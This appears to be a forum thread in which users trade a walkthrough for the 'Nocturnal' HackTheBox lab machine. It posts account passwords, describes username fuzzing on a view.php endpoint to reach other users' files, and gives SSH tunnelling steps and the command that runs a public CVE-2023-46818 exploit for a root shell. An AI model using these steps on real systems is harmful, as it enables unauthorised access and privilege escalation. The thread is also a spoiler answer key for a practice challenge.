[RedBlock]

here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt

Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life.

[marc4442]

---

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

how to download the sql dump I'm geting a 403.

Login as amanda:arHkG7HAI68X8s1J

Create backup with the password arHkG7HAI68X8s1J

and unzip with the same password arHkG7HAI68X8s1J

Thanks it worked. But how did you find the creds for that account?

find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account

What Wordlist you was use for Bruteforce that have inside the amanda User?

[machakilos]

here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt

Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life.

Just remove the 8 credits bro or at least put 1 lol

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Reposting hidden content for free

[Liy4]

We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??

[pbloraneFH]

here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt

Thanks man! I really appreciate it.

[vasabig88]

$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

did ot work for me.
needed to reboot box, to get command execution.
Maybe will help someone

[xxxxxxxxxz]

We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??

Use burp suite or ZAP (if you don't have pro burp) to fuzz usernames. You can register an account, upload a dummy file. Then you can click on your uploaded file and intercept that request. Then fuzz the username value with a name list. You can sort the response size to find amanda.

[maggi]

We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??

fuzing and a wordlist (ffuf is dank)

[HSO]

thanks for sharing brother

[luiner]

Easy root:





That's it! Pwned. Enjoy

how did you found out this vulnerability?